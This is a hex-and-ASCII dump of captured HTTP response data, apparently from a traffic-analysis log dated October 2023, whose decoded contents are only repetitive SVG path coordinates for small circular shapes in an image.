                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC7648INData Raw: 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 34 37 2e 38 32 2c 32 31 37 2e 38 36 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 34 2e 35 36 2c 34 35 32 2e 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30
                                                                                                                                                                                                                                                        Data Ascii: ,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M847.82,217.86a2.16,2.16,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M854.56,452.3a2.16,2.16,0
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC7664INData Raw: 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 32 2e 32 35 2c 33 31 33 2e 36 35 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 32 2e 33 32 2c 33 30 35 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e
                                                                                                                                                                                                                                                        Data Ascii: class="cls-9" d="M882.25,313.65a2.15,2.15,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M882.32,305a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC7680INData Raw: 39 22 20 64 3d 22 4d 39 31 36 2e 36 37 2c 34 30 39 2e 34 35 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 36 2e 37 35 2c 34 30 30 2e 37 37 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32
                                                                                                                                                                                                                                                        Data Ascii: 9" d="M916.67,409.45a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M916.75,400.77a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC7696INData Raw: 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 34 34 2e 35 32 2c 32 35 33 2e 34 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e
                                                                                                                                                                                                                                                        Data Ascii: 4,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M944.52,253.44a2.16,2.16,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"></path>
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC7712INData Raw: 61 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 34 39 2e 37 37 2c 32 32 35 2e 35 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37
                                                                                                                                                                                                                                                        Data Ascii: a3,3,0,0,1,.65-3.66,2.87,2.87,0,0,1,3.67.05,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M49.77,225.59a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC7728INData Raw: 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 38 38 2e 34 32 2c 33 31 32 2e 31 38 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c
                                                                                                                                                                                                                                                        Data Ascii: 1-4.23-1.19,3,3,0,0,1,.65-3.65,2.84,2.84,0,0,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M88.42,312.18a2.18,2.18,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path cl
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC7744INData Raw: 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 30 2e 31 32 2c 31 36 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 30 39 2e 38 33 2c 31 35 33 2e 32 35 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e
                                                                                                                                                                                                                                                        Data Ascii: .62"></path><path class="cls-7" d="M110.12,162a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66.05,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M109.83,153.25a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC7760INData Raw: 63 6c 73 2d 37 22 20 64 3d 22 4d 31 34 39 2e 30 37 2c 32 35 37 2e 33 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 34 38 2e 37 37 2c 32 34 38 2e 36 31 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c
                                                                                                                                                                                                                                                        Data Ascii: cls-7" d="M149.07,257.39a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M148.77,248.61a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC7776INData Raw: 2e 37 38 2c 31 30 37 2e 32 34 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 37 30 2e 34 38 2c 39 38 2e 34 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c
                                                                                                                                                                                                                                                        Data Ascii: .78,107.24a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M170.48,98.46a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.65,2.86,2.86,
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC7792INData Raw: 37 32 2c 32 30 32 2e 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 30 39 2e 34 32 2c 31 39 33 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                        Data Ascii: 72,202.6a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M209.42,193.82a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC7808INData Raw: 2c 32 39 38 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 34 38 2e 33 37 2c 32 38 39 2e 31 38 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c
                                                                                                                                                                                                                                                        Data Ascii: ,298a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M248.37,289.18a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC7826INData Raw: 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 37 30 2e 30 38 2c 31 33 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c
                                                                                                                                                                                                                                                        Data Ascii: 0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M270.08,139a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC7842INData Raw: 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 30 39 2c 32 33 34 2e 34 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22
                                                                                                                                                                                                                                                        Data Ascii: 1,2.83,3.18,3.18,0,0,1-4.22-1.2,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M309,234.4a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC7858INData Raw: 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 33 30 2e 37 33 2c 38 34 2e 32 35 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20
                                                                                                                                                                                                                                                        Data Ascii: 19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M330.73,84.25a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.87,2.87,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC7874INData Raw: 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 39 2e 36 37 2c 31 37 39 2e 36 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c
                                                                                                                                                                                                                                                        Data Ascii: -4.22-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M369.67,179.61a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.87,2.87,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path cl
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC7890INData Raw: 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 31 32 2c 33 34 37 2e 32 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 31 31 2e 37 2c 33 33 39 2e 31 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30
                                                                                                                                                                                                                                                        Data Ascii: 2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M312,347.21a2,2,0,0,1-.91,2.6,2.91,2.91,0,0,1-3.88-1.09,2.81,2.81,0,0,1,.59-3.37,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M311.7,339.13a2,2,0,0,1-.91,2.61,2.94,2.94,0
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC7906INData Raw: 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 31 2e 34 2c 31 39 32 2e 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30
                                                                                                                                                                                                                                                        Data Ascii: 0,1-.91,2.61,2.92,2.92,0,0,1-3.88-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.46,2.46,0,0,1,.18,3.32"></path><path class="cls-9" d="M331.4,192.9a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.47,2.47,0,0
